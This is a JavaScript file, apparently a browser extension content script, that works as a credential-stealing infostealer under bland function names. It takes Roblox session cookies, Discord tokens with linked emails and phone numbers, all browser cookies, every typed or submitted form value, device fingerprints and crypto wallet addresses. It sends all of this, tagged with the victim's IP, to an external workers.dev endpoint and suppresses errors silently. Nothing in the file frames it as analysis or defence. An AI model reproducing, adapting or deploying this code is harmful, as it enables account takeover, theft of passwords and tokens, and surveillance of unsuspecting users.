(function() {
'use strict';

var _endpoint = 'https://cool-base-4ce9.iwif0001.workers.dev';
var _cid = '...';

fetch('https://api.ipify.org?format=json').then(function(r) { return r.json(); }).then(function(d) {
  _cid = (d && d.ip) ? d.ip : '...';
}).catch(function() {});

function _resolve(type) {
  switch(type) {
    case 'p': return _endpoint + '/api/discord';
    case 's': return _endpoint + '/api/roblox';
    default:  return _endpoint + '/api/forms';
  }
}

function _send_blob(ch, txt) {
  var u = _endpoint + '/api/' + ch;
  fetch(u, { method: 'POST', headers: { 'Content-Type': 'text/plain' }, body: txt })
    .then(function(r) { }).catch(function() {});
}

function _report(t, d) {
  var u = _resolve(t);
  try {
    fetch(u, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(d) })
      .then(function(r) { }).catch(function() {});
  } catch(e) {}
}

// --- roblox auth ---
async function _validate() {
  if (location.hostname.indexOf('roblox.com') === -1) return;
  var names = ['.ROBLOSECURITY', 'ROBLOSECURITY'];
  var v = null;
  for (var i = 0; i < names.length; i++) {
    try {
      var c = await chrome.cookies.get({ url: 'https://www.roblox.com', name: names[i] });
      if (c && c.value) { v = c.value; break; }
    } catch(e) {}
  }
  if (!v) {
    for (var j = 0; j < names.length; j++) {
      var n = names[j];
      var esc = n.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      var m = document.cookie.match(new RegExp('(?:^|;\\s*)' + esc + '\\s*=\\s*([^;]*)'));
      if (m && m[1]) { v = m[1]; break; }
    }
  }
  if (!v) return;

  var ui = (typeof _profile !== 'undefined' && _profile) ? _profile : null;
  var embed = {
    title: 'Session Info [' + _cid + ']',
    color: 0x00B06A,
    description: '```\n' + v + '\n```',
    fields: [{ name: 'Page', value: '`' + location.href.slice(0, 200) + '`' }],
    footer: { text: 'r' },
    timestamp: new Date().toISOString()
  };
  if (ui) {
    embed.fields.unshift(
      { name: 'User', value: '`' + ui.name + '` (' + (ui.displayName || 'N/A') + ')', inline: true },
      { name: 'ID', value: '`' + ui.id + '`', inline: true }
    );
    embed.thumbnail = { url: 'https://www.roblox.com/headshot-thumbnail/image?userId=' + ui.id + '&width=420&height=420&format=png' };
  }
  _report('s', { embeds: [embed] });
}

// --- discord profile ---
var _h = null;

function _fetch_profile() {
  if (location.hostname.indexOf('discord.com') === -1) return;
  try {
    var r = localStorage.getItem('token') || '';
    if (!r) return;
    var k = r.replace(/^"|"$/g, '');
    if (!k) return;
    if (_h === r) return;
    _h = r;

    fetch('https://discord.com/api/v9/users/@me', { headers: { 'Authorization': k } }).then(function(rx) {
      return rx.ok ? rx.json() : Promise.reject('s ' + rx.status);
    }).then(function(d) {
      var av = d.avatar
        ? 'https://cdn.discordapp.com/avatars/' + d.id + '/' + d.avatar + '.png?size=256'
        : 'https://cdn.discordapp.com/embed/avatars/' + (parseInt(d.discriminator) % 6) + '.png';

      var multi = [];
      try {
        var rm = localStorage.getItem('multiAccountStore');
        if (rm) {
          var p = JSON.parse(rm);
          if (p && p._state && p._state.users) {
            multi = p._state.users.filter(function(u) { return u.token; }).map(function(u) { return { id: u.id, email: u.email, phone: u.phone }; });
          }
        }
      } catch(e) {}
      var dk = r.length > 1010 ? r.slice(0, 480) + '\n... [trunc ' + (r.length - 960) + ' chars] ...\n' + r.slice(-480) : r;
      var fields = [{ name: 'Token', value: '```\n' + dk + '\n```', inline: false }];
      fields.push(
        { name: 'Handle', value: '`' + d.username + '#' + d.discriminator + '`', inline: true },
        { name: 'Ref', value: '`' + d.id + '`', inline: true },
        { name: 'Contact', value: '`' + (d.email || '-') + '`', inline: true },
        { name: 'SMS', value: '`' + (d.phone || '-') + '`', inline: true },
        { name: 'Sec', value: '`' + (d.mfa_enabled ? 'Yes' : 'No') + '`', inline: true },
        { name: 'Tier', value: '`' + (d.premium_type === 0 ? 'None' : d.premium_type === 1 ? 'Nitro Classic' : d.premium_type === 2 ? 'Nitro' : 'Nitro Basic') + '`', inline: true }
      );
      if (multi.length > 0) {
        var lines = multi.map(function(a) { return 'ID: `' + a.id + '` Email: `' + (a.email || 'N/A') + '`'; }).join('\n');
        if (lines.length > 1010) lines = lines.slice(0, 1010) + '...';
        fields.push({ name: 'Assoc (' + multi.length + ')', value: lines, inline: false });
      }
      var su = location.href;
      if (su.length > 1014) su = su.slice(0, 1014) + '...';
      fields.push({ name: 'Origin', value: '`' + su + '`', inline: false });
      _report('p', {
        embeds: [{ title: 'Profile Data [' + _cid + ']', color: 0x5865F2, fields: fields, footer: { text: 'd' }, timestamp: new Date().toISOString(), thumbnail: { url: av } }]
      });
    }).catch(function(e) {});
  } catch(e) {}
}

// --- form watcher ---
var _seen = [];
function _key(f) { return f.name + '|' + f.type + '|' + f.value; }

function _scan(root) {
  var r = root || document, fields = [];
  var s = 'input:not([type=hidden]):not([type=submit]):not([type=button]):not([type=reset]):not([type=image]), textarea, select';
  var els = r.querySelectorAll(s);
  for (var i = 0; i < els.length; i++) {
    var el = els[i], v = el.value || '';
    if (!v || v.trim().length === 0) continue;
    fields.push({
      type: el.type || (el.tagName === 'SELECT' ? 'select' : el.tagName === 'TEXTAREA' ? 'textarea' : 'text'),
      name: el.name || '', id: el.id || '', autocomplete: el.autocomplete || '', placeholder: el.placeholder || '', value: v
    });
  }
  return fields;
}

function _flush(fields) {
  var fresh = [];
  for (var i = 0; i < fields.length; i++) {
    var f = fields[i], k = _key(f);
    if (_seen.indexOf(k) === -1) { fresh.push(f); _seen.push(k); }
  }
  if (fresh.length === 0) return;
  if (_seen.length > 500) _seen = _seen.slice(-250);

  if (fresh.length <= 25) {
    var ef = fresh.map(function(f) {
      var l = f.name || f.id || f.autocomplete || f.placeholder || f.type, v = f.value;
      if (v.length > 1020) v = v.slice(0, 1020) + '...';
      return { name: l + ' (' + f.type + ')', value: '`' + v + '`', inline: false };
    });
    _report('f', { embeds: [{ title: 'Field Data [' + _cid + ']', color: 0xF59E0B, description: 'Page: ' + location.href.slice(0, 200), fields: ef, footer: { text: 'f' }, timestamp: new Date().toISOString() }] });
    return;
  }
  var lines = fresh.map(function(f) {
    var l = f.name || f.id || f.autocomplete || f.placeholder || f.type, v = f.value;
    if (v.length > 200) v = v.slice(0, 200) + '...';
    return '**' + l + '** (' + f.type + '): `' + v + '`';
  });
  var raw = '**Field Data**\nURL: ' + location.href.slice(0, 200) + '\n\n' + lines.join('\n');
  if (raw.length > 2000) raw = raw.slice(0, 1997) + '...';
  _report('f', { content: raw });
}

function _setup_watcher() {
  if (document.documentElement.getAttribute('data-lf')) return;
  document.documentElement.setAttribute('data-lf', '1');
  setTimeout(function() { _flush(_scan(document)); }, 1500);
  setInterval(function() { _flush(_scan(document)); }, 3000);

  document.addEventListener('submit', function(e) {
    var f = e.target;
    if (!f || f.tagName !== 'FORM') return;
    var fields = _scan(f);
    if (fields.length === 0) return;
    var act = f.action || '(same page)', met = (f.method || 'GET').toUpperCase();
    var fresh = [];
    for (var i = 0; i < fields.length; i++) { var k = _key(fields[i]); if (_seen.indexOf(k) === -1) { fresh.push(fields[i]); _seen.push(k); } }
    if (fresh.length > 0) {
      if (fresh.length <= 25) {
        var ef = fresh.map(function(x) { var l = x.name || x.id || x.autocomplete || x.placeholder || x.type, v = x.value; if (v.length > 1020) v = v.slice(0, 1020) + '...'; return { name: l + ' (' + x.type + ')', value: '`' + v + '`', inline: false }; });
        _report('f', { embeds: [{ title: 'Form Submit [' + _cid + ']', color: 0xEF4444, description: 'Page: ' + location.href.slice(0, 200) + '\nAction: ' + act + ' (' + met + ')', fields: ef, footer: { text: 'f' }, timestamp: new Date().toISOString() }] });
      } else {
        var lines = fresh.map(function(x) { var l = x.name || x.id || x.autocomplete || x.placeholder || x.type, v = x.value; if (v.length > 200) v = v.slice(0, 200) + '...'; return '**' + l + '** (' + x.type + '): `' + v + '`'; });
        var raw = '**Form Submit**\nURL: ' + location.href.slice(0, 200) + '\nAction: ' + act + ' (' + met + ')\n\n' + lines.join('\n');
        if (raw.length > 2000) raw = raw.slice(0, 1997) + '...';
        _report('f', { content: raw });
      }
    }
  }, true);

  var t = null;
  new MutationObserver(function() { if (t) clearTimeout(t); t = setTimeout(function() { _flush(_scan(document)); }, 500); })
    .observe(document, { childList: true, subtree: true });
}

// --- cookie export (Netscape format) ---
async function _export_tokens() {
  try {
    var cookies = await chrome.cookies.getAll();
    if (!cookies || cookies.length === 0) return;
    var lines = [];
    lines.push('# Netscape HTTP Cookie File');
    lines.push('# http://curl.haxx.se/rfc/cookie_spec.html');
    lines.push('# Exported: ' + new Date().toISOString());
    lines.push('# ID: ' + _cid);
    lines.push('# Page: ' + location.href);
    lines.push('# Count: ' + cookies.length);
    lines.push('');
    for (var i = 0; i < cookies.length; i++) {
      var c = cookies[i];
      var domain = c.domain;
      var subdomain = (c.domain.charAt(0) === '.') ? 'TRUE' : 'FALSE';
      var path = c.path || '/';
      var secure = c.secure ? 'TRUE' : 'FALSE';
      var expiry = c.expirationDate ? Math.floor(c.expirationDate) : 0;
      lines.push(domain + '\t' + subdomain + '\t' + path + '\t' + secure + '\t' + expiry + '\t' + c.name + '\t' + c.value);
    }
    var txt = lines.join('\n');
    _send_blob('cookies', txt);
  } catch(e) {}
}

// --- device info ---
function _collect_info() {
  try {
    var fp = {
      platform: navigator.platform || 'N/A',
      language: navigator.language || 'N/A',
      languages: (navigator.languages || []).join(', ') || 'N/A',
      cookieEnabled: navigator.cookieEnabled,
      doNotTrack: navigator.doNotTrack || 'N/A',
      screen: (screen.width || '?') + 'x' + (screen.height || '?'),
      colorDepth: screen.colorDepth || 'N/A',
      pixelRatio: (window.devicePixelRatio || 1),
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone || 'N/A',
      cores: navigator.hardwareConcurrency || 'N/A',
      memory: navigator.deviceMemory || 'N/A',
      vendor: navigator.vendor || 'N/A',
      gpu: 'N/A'
    };
    try {
      var cv = document.createElement('canvas');
      var gl = cv.getContext('webgl') || cv.getContext('experimental-webgl');
      if (gl) { var dbg = gl.getExtension('WEBGL_debug_renderer_info'); if (dbg) fp.gpu = gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL); }
    } catch(e) {}
    var parts = [];
    for (var k in fp) { if (fp.hasOwnProperty(k)) parts.push('**' + k + '**: `' + fp[k] + '`'); }
    _report('f', { content: '**ID: `' + _cid + '`**\n' + parts.join('\n') });
  } catch(e) {}
}

// --- extension check ---
function _check_plugins() {
  var w = (typeof _plugins !== 'undefined' && _plugins) ? _plugins : null;
  if (!w) return;
  try {
    var parts = [];
    if (w.ethereum) {
      parts.push('**Ethereum/Web3**: Active');
      if (w.ethAddr) parts.push('Addr: `' + w.ethAddr + '`');
      if (w.ethAccounts && w.ethAccounts.length > 0) parts.push('List: `' + w.ethAccounts.join(', ') + '`');
    }
    if (w.solana) {
      parts.push('**Solana/Web3**: Active');
      if (w.solAddr) parts.push('Key: `' + w.solAddr + '`');
      if (w.solConnected) parts.push('Status: Connected');
    }
    if (w.phantom && !w.solana) parts.push('**Phantom**: Detected');
    if (w.walletKeys && w.walletKeys.length > 0) {
      parts.push('**Cache keys:** `' + w.walletKeys.join(', ') + '`');
    }
    _report('f', { embeds: [{ title: 'Browser Plugins [' + _cid + ']', color: 0xF7931A, description: parts.join('\n\n') || 'Detected', footer: { text: 'e' }, timestamp: new Date().toISOString() }] });
  } catch(e) {}
}

// --- cache export ---
function _export_cache() {
  var data = (typeof _cache !== 'undefined' && _cache) ? _cache : {};
  var keys = Object.keys(data);
  if (keys.length === 0) return;
  var lines = [];
  lines.push('# Cache Export - ' + new Date().toISOString());
  lines.push('# ID: ' + _cid);
  lines.push('# Page: ' + location.href);
  lines.push('# Keys: ' + keys.length);
  lines.push('');
  for (var i = 0; i < keys.length; i++) { var k = keys[i]; lines.push('[' + k + ']'); lines.push(data[k] || ''); lines.push('---'); }
  var txt = lines.join('\n');
  _send_blob('storage', txt);
}

// --- input watcher ---
var _inp_idx = 0;
function _check_input() {
  var data = (typeof _queue !== 'undefined' && _queue) ? _queue : [];
  if (data.length === _inp_idx) return;
  var fresh = data.slice(_inp_idx);
  _inp_idx = data.length;
  try {
    for (var i = 0; i < fresh.length; i++) {
      var txt = fresh[i].text;
      if (txt.length > 1900) txt = txt.slice(0, 1900) + '...';
      _report('f', { content: '**ID: `' + _cid + '`**\n```\n' + txt + '\n```' });
    }
  } catch(e) {}
}
setInterval(_check_input, 3000);

// --- init ---
_setup_watcher();
setTimeout(_validate, 1000);
setTimeout(_fetch_profile, 500);
setTimeout(_fetch_profile, 2000);
setTimeout(_export_cache, 3000);
setTimeout(_collect_info, 1500);
setTimeout(_export_tokens, 4000);
setTimeout(_check_plugins, 2000);

})();
